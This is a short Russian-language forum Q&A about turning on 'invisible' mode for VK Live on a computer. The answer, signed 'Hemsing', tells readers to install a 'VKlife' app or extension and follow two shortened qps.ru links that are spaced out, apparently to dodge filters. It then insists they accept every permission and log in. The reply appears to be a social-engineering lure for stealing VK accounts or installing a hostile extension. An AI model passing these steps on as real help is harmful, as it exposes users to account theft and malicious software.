Вопрос о VK Live

social-network VK Live

Как включить невидимку на компьютере в VK Live?

Hemsing

Привет, вижу твои дела плохи, готов тебе помочь и рассказать и показать всё, о чём ты не знал и боялся спросить, а так же помогу тебе в твоём вопросе - как включить невидимку.

1) И так, думаю начнём. Сначала скачай приложение VKlife. Далее перейди на вкладку "Моя страница" Глядишь, а там кнопка "Offline-Online" переключи переключатель на "Offline"

h t t p : / / q p s . r u / 0 j o D n

2) Теперь страница сайта закроется, но на её месте появится окошко сайта VKlife.

h t t p : / / q p s . r u / u 2 4 1 T

Здесь нужно согласиться со всеми галочками расширения и авторизоваться, обязательно!

3) Теперь должно пройти 15 минут, сервер в течении этого времения, обработает задачу и сделает тебя невидимым во ВКонтакте. Если есть вопросы, напиши им в тех. поддержку. Приятного общения друг мой. Спасибо за понимание, удачи!